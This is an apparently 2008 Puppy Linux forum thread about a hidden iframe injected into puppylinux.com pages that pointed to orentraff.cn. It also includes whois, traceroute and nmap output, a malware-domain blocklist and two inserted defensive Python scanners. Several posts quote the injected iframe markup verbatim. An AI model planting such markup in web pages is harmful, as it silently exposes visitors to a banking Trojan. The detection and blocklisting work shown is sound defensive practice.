Virus warning from www.puppylinux.com/manuals.htm

Puppy related raves and general interest that doesn't fit anywhere else
georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

Virus warning from www.puppylinux.com/manuals.htm

#1 Post by georgejc »

Hi,

I just sent a friend to try out Puppy, and he received several virus warnings from http://www.puppylinux.com/manuals.htm

Searching the forums, I noticed that you have had this problem in the past.

Also, just curious, why is this link http://orentraff.cn/in.cgi?7 in that page?

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#2 Post by Caneri »

Yes something is not good here.

There is a redirect showing to China...please correct this...as it's a problem.

Eric
[color=darkred][i]Be not afraid to grow slowly, only be afraid of standing still.[/i]
Chinese Proverb[/color]

wingruntled

#3 Post by wingruntled »

BUMP!
Somebody really needs to fix this!!!

<big>http://www.puppy-linux.info/</big></big><iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe></a> <br>

georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

More bad news

#4 Post by georgejc »

Hi,

I know I'm new here, but I just found another page with the
<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe>
hidden at this page: http://www.puppylinux.com/cd-puppy.htm

If the people that run this site need some help, please contact me, and maybe I can be of some help and I'll let you know what kind of sites I can work on.

I would HIGHLY recommend that EVERY page be checked!

wingruntled

#5 Post by wingruntled »

Gjc
The puppylinux domain belongs to Barry Kauler himself.
BTW: good eye! I was looking for stray address in the other pages myself.

georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

Owner of Domain

#6 Post by georgejc »

Don't know if this guy is the victim or the criminal, but here is the whois data for that Chinese site:

Whois orentraff.cn

Domain Name: orentraff.cn

The results below are provided by CNNIC (China Internet Network Information Center - www.cnnic.net.cn) (whois.cnnic.net.cn)

Domain Name: orentraff.cn
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar: 厦门å

wingruntled

#7 Post by wingruntled »

I tracked down this Trojan that is plugged into puppylinux by that admin email address and it's nothing to sneeze at.
The Trojan primarily targets bank accounts and depending on the plugins installed, it may be able to perform the following activities:

* Gather sensitive information about the computer and user configuration information.
* Update itself and install new modules.
* Steal sensitive information contained in forms posted over HTTP (see webmail example)
* Steal local certificate files (*.pfx)
* Hijack the browser navigation.

Note: The hijacking browser navigation functionality of the Trojan may be used to steal confidential bank credentials by redirecting users to phishing Web sites when they attempt to login on certain predetermined web banking sites.
http://www.bluetack.co.uk/forums/lofive ... 18052.html

ttuuxxx
Posts: 11171
Joined: Sat 05 May 2007, 10:00
Location: Ontario Canada,Sydney Australia

#8 Post by ttuuxxx »

I just tried it and on the bottom of the page it was trying to bring up that china website. I think the page should be deleted straight away and maybe the links and remade some place else. Just for security reasons.
ttuuxxx
http://audio.online-convert.com/ <-- excellent site
http://samples.mplayerhq.hu/A-codecs/ <-- Codec Test Files
http://html5games.com/ <-- excellent HTML5 games :)

alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#9 Post by alienjeff »

<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none">
Found on:
http://www.puppylinux.com/news.htm
http://www.puppylinux.com/forums.htm
http://www.puppylinux.com/flash-puppy.htm
http://www.puppylinux.com/cd-puppy.htm
http://www.puppylinux.com/hard-puppy.htm
http://www.puppylinux.com/faq.htm
http://www.puppylinux.com/links.htm
http://www.puppylinux.com/zippy-puppy.htm
http://www.puppylinux.com/thin-puppy.htm
http://www.puppylinux.com/emulator-puppy.htm
http://www.puppylinux.com/manuals.htm

Ahem!

Makes one wonder what might be buried in the ISOs.

On a more humorous note, here's another gem uncovered whilst scanning Barry's HTML source:

<meta name="GENERATOR" content="IBM WebSphere Studio Homepage Builder V6.0.0 for Windows">
Guess Bluefish, Amaya, Composer (or e3, Leafpad or Geany, for that matter) and their ilk aren't good enough for some folks.

EDIT/ADDITION: Of more peculiar interest, note that Barry was building some of those pages while running Windows OS. Irony, sweet irony ...
Last edited by alienjeff on Sun 02 Mar 2008, 15:34, edited 1 time in total.
[size=84][i]hangout:[/i] ##b0rked on irc.freenode.net
[i]diversion:[/i] [url]http://alienjeff.net[/url] - visit The Fringe
[i]quote:[/i] "The foundation of authority is based upon the consent of the people." - Thomas Hooker[/size]
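The check georgejc asked for in post #4 ("EVERY page be checked") and alienjeff carried out by hand in post #9 can be scripted. The following is an added example, not code from the forum or from the Puppy project: it parses saved copies of the HTML pages, flags every iframe that is both hidden (zero width or height, or `display:none`/`visibility:hidden`) and points at a host other than the page's own, and optionally marks hits that fall on a supplied blocklist. The sample pages are constructed; the first one reproduces the injected markup quoted in post #3. In practice you would feed it a local mirror of the site (for example the output of a recursive `wget`) and treat any finding as a signal to inspect the page, not as proof on its own; it will not catch loaders injected via obfuscated JavaScript, since it looks only at iframe tags.

```python
"""Scan saved HTML pages for hidden, off-site iframes of the kind found on
puppylinux.com in this thread.  Added example; the sample pages below are
constructed and the blocklist is whatever the caller passes in."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeFinder(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Valueless attributes arrive as None; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True for the classic drive-by pattern: 0x0 frame or hidden via CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = ("0", "0px")
    tiny = attrs.get("width", "").strip() in zero or attrs.get("height", "").strip() in zero
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_hidden_offsite_iframes(page_url, html):
    """Return [(src, host)] for hidden iframes whose host differs from the page's."""
    page_host = urlparse(page_url).hostname or ""
    parser = IframeFinder()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        # A relative src stays on the same host, so it is never "off-site".
        host = urlparse(src).hostname or page_host
        if host != page_host and is_hidden(attrs):
            hits.append((src, host))
    return hits


def scan_site(pages, blocklist=()):
    """pages: {url: html}.  Returns {url: [(src, host, on_blocklist), ...]}
    containing only the pages that had findings."""
    report = {}
    for url, html in pages.items():
        hits = find_hidden_offsite_iframes(url, html)
        if hits:
            report[url] = [(src, host, host in blocklist) for src, host in hits]
    return report


# Constructed samples: the first mirrors the injected markup quoted in this
# thread, the second is a benign visible embed, the third is clean.
SAMPLE_PAGES = {
    "http://www.puppylinux.com/manuals.htm":
        '<p><big>http://www.puppy-linux.info/</big></big>'
        '<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" '
        'style="display:none"></iframe></a> <br>',
    "http://www.puppylinux.com/links.htm":
        '<iframe src="http://example.org/player" width="400" height="300"></iframe>',
    "http://www.puppylinux.com/faq.htm":
        "<html><body><p>FAQ</p></body></html>",
}

if __name__ == "__main__":
    for url, findings in scan_site(SAMPLE_PAGES, blocklist={"orentraff.cn"}).items():
        for src, host, blocked in findings:
            print(f"{url}: hidden off-site iframe -> {src} (host {host}, blocklisted={blocked})")
```

Run against the samples it reports only manuals.htm; the visible 400x300 embed on links.htm is left alone because being off-site is not by itself suspicious.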

georgejc
Posts: 4
Joined: Thu 28 Feb 2008, 20:58
Location: Montreal, Quebec, Canada

Stupid Question

#10 Post by georgejc »

This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?

wingruntled

#11 Post by wingruntled »

aj
Some of those pages were clean last night. It looks like this one is a prolific breeder.

Gjc
person who is responsible for puppylinux.com actually read any of these forum postings,
Sometimes, but it seems like he keeps his distance.

alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

Re: Stupid Question

#12 Post by alienjeff »

georgejc wrote:This may be a stupid question...
"There are no stupid questions, but there are a LOT of inquisitive idiots." - Dr`Keovorkian, ChanOp #puppylinux

Lobster
Official Crustacean
Posts: 15522
Joined: Wed 04 May 2005, 06:06
Location: Paradox Realm

Re: Stupid Question

#13 Post by Lobster »

georgejc wrote:This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?
I have already sent Barry Kauler a PM (private message) through this forum

:)
Last edited by Lobster on Sat 08 Mar 2008, 06:50, edited 1 time in total.
Puppy Raspup 8.2Final 8)
Puppy Links Page http://www.smokey01.com/bruceb/puppy.html :D

prehistoric
Posts: 1744
Joined: Tue 23 Oct 2007, 17:34

manuals mirror

#14 Post by prehistoric »

The manuals are also mirrored at http://puppylover.netsons.org/dokupuppy/. I just did a very quick check for "orentraff" and didn't find that string. That doesn't rule out another redirect which my eyes aren't sharp enough to catch right away.

I doubt Grisha Nizov is Chinese. I've been looking for an interloper who speaks a language more likely to be associated with the name.

alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#15 Post by alienjeff »

http://www.siteadvisor.com/sites/orentraff.cn/summary/
http://www.dnsstuff.com/tools/ipall.ch? ... 21.133.106
IP address: 77.221.133.106
Reverse DNS: 77.221.133.106.addr.datapoint.ru.
Reverse DNS authenticity: [Could be forged: hostname 77.221.133.106.addr.datapoint.ru. does not exist]
ASN: 0
ASN Name: IANA-RSVD-0
IP range connectivity: 0
Registrar (per ASN): Unknown
Country (per IP registrar): RU [Russian Federation]
Country Currency: RUR [Russia Rubles]
Country IP Range: 77.221.128.0 to 77.221.159.255
Country fraud profile: High
City (per outside source): Unknown
Country (per outside source): RU [Russian Federation]
Private (internal) IP? No
IP address registrar: BOGUS
Known Proxy? No
Link for WHOIS: 77.221.133.106

http://www.globedomain.com/forums/viewt ... view=print

sh-3.00# traceroute 77.221.133.106
traceroute to 77.221.133.106 (77.221.133.106), 30 hops max, 40 byte packets
1 192.168.123.254 (192.168.123.254) 1.256 ms 4.221 ms 1.196 ms
2 10.30.0.1 (10.30.0.1) 7.899 ms 8.047 ms 8.248 ms
3 172.20.97.1 (172.20.97.1) 9.57 ms 19.111 ms 13.811 ms
4 172.20.98.65 (172.20.98.65) 11.093 ms 8.163 ms 8.19 ms
5 172.20.103.34 (172.20.103.34) 10.803 ms 9.344 ms 17.053 ms
6 so-9-1.car2.Boston1.Level3.net (4.79.2.41) 28.061 ms 16.341 ms 13.772 ms
7 ae-5-5.ebr1.NewYork1.Level3.net (4.69.132.250) 22.926 ms 29.744 ms 21.959 ms
8 ae-4.ebr2.London1.Level3.net (4.69.132.110) 104.017 ms 88.724 ms 96.972 ms
9 ae-2.ebr2.Amsterdam1.Level3.net (4.69.132.134) 107.602 ms 104.205 ms 108.036 ms
10 ae-1-100.ebr1.Amsterdam1.Level3.net (4.69.133.85) 109.212 ms 98.03 ms 104.995 ms
11 ae-2.ebr2.Dusseldorf1.Level3.net (4.69.133.90) 106.62 ms 107.116 ms 106.284 ms
12 ae-4-4.car1.Stockholm1.Level3.net (4.69.135.21) 127.446 ms 126.947 ms 129.787 ms
13 rt741-001.stk.retn.net (213.242.110.18) 126.603 ms 134.132 ms 128.836 ms
14 ae0-3.RT008-002.spb.retn.net (81.222.15.45) 139.494 ms 137.416 ms 138.096 ms
15 GW-InfoBox.retn.net (81.222.2.102) 138.268 ms 140.336 ms 145.495 ms
16 77.221.128.58.addr.datapoint.ru (77.221.128.58) 144.319 ms 139.417 ms 137.992 ms
17 * * *

sh-3.00# nmap 77.221.133.106

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2008-03-01 06:31 PUP
Interesting ports on 77.221.133.106.addr.datapoint.ru (77.221.133.106):
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp closed pop3
143/tcp closed imap
443/tcp closed https
465/tcp closed smtps
953/tcp closed rndc
993/tcp closed imaps
995/tcp closed pop3s

Nmap finished: 1 IP address (1 host up) scanned in 31.860 seconds

alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#16 Post by alienjeff »

From http://malwaredomains.com/?tag=fake-codecs

DNS Blocklist Update 12/29
Posted on December 29th, 2007 in New Domains, Storm Worm, fake codecs by dglosser

Added: storm worm domains, rogue antivirus, fake codecs

e-learningcenter.ru flashupdate.net
googl.name health-hack.com
home-xxx.com jkh-novgorod.ru
juhost.ru l0calh0st.jino-net.ru
natural-amber.com newyearwithlove.com
orentraff.cn qarchive.net
s0s1.net taktomi.ru
traffurl.ru trffc.org
vip-ddos.org x5x.ru
xll-g.com milk0soft.com
xmaturelife.com


updates are located at http://www.malwaredomains.com/updates
The full files are located at: http://www.malwaredomains.com/files

BOOT file is in MS DNS format
spywaredomains.zones file is in BIND Server format
domains.txt file is the complete list along with original reference
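The malwaredomains update quoted in post #16 is meant to be consumed by a resolver or a hosts file, and the subtlety a practitioner hits is that a blocklist entry for `orentraff.cn` must also cover `anything.orentraff.cn`, while not turning into a block on the whole `.cn` TLD. The following is an added example, not the malwaredomains project's own tooling: it parses the whitespace-separated update text, answers "is this host or URL blocked?" with parent-domain matching, and emits BIND master-zone stanzas that point each domain at a local sinkhole zone file. The domain list is constructed from the ones quoted above, and the stanza layout and sinkhole file path are assumptions about the BIND-format file the post mentions, not copied from it.

```python
"""Parse a malwaredomains-style domain list, match hosts against it with
parent-domain matching, and emit BIND sinkhole zone stanzas.  Added example;
the update text below is constructed from domains quoted in the thread, and
the zone stanza format / sinkhole path are assumed."""
from urllib.parse import urlparse

# Constructed excerpt in the same layout as the quoted update (several
# domains per line, whitespace separated).
UPDATE_TEXT = """\
e-learningcenter.ru flashupdate.net
googl.name health-hack.com
orentraff.cn qarchive.net
traffurl.ru trffc.org
"""


def parse_domain_list(text):
    """Return a set of lowercased domains; tokens without a dot are ignored."""
    return {
        tok.lower().rstrip(".")
        for line in text.splitlines()
        for tok in line.split()
        if "." in tok
    }


def is_blocked(host, blocked):
    """True if host or any parent domain is listed, e.g. cdn.orentraff.cn
    matches orentraff.cn.  The bare TLD is never tested, so a listed
    second-level domain cannot block the whole TLD."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocked for i in range(len(labels) - 1))


def url_blocked(url, blocked):
    """Convenience wrapper for URLs such as the injected iframe src."""
    host = urlparse(url).hostname
    return bool(host) and is_blocked(host, blocked)


def bind_zone_stanzas(blocked, sinkhole_file="/etc/namedb/blockeddomain.hosts"):
    """One master-zone stanza per listed domain (format assumed).  Because
    BIND serves the whole zone, subdomains are sinkholed automatically."""
    return "\n".join(
        f'zone "{d}" {{type master; file "{sinkhole_file}";}};' for d in sorted(blocked)
    )


if __name__ == "__main__":
    blocked = parse_domain_list(UPDATE_TEXT)
    print(url_blocked("http://orentraff.cn/in.cgi?7", blocked))  # the iframe from this thread
    print(bind_zone_stanzas(blocked))
```

The sinkhole zone file itself (`blockeddomain.hosts` here) is a small zone whose `A`/`AAAA` records point at a local address such as 127.0.0.1, so lookups of a listed domain resolve locally and the hidden iframe never reaches the hosting server.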

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#17 Post by Caneri »

Hey thanks AJ,

I've been getting a huge spike in traffic out of .ru

It says it's from puppyrus but I will definitely look much closer at this.

Eric

wingruntled

#18 Post by wingruntled »

Where is Barry?
The manual page is still infected.

alienjeff
Posts: 2265
Joined: Sat 08 Jul 2006, 20:19
Location: Winsted, CT - USA

#19 Post by alienjeff »

wingruntled wrote:Where is Barry?
Where's the emoticon for "bites down on tongue?"

purple_ghost
Posts: 416
Joined: Thu 10 Nov 2005, 02:18

Question is:

#20 Post by purple_ghost »

For the ordinary users. Have we been left with a Trojan in Puppy Linux itself? Did I download a working Trojan with the manual? Should I rebuild my pup_save file?
Google Search of Forum: http://wellminded.com/puppy/pupsearch.html
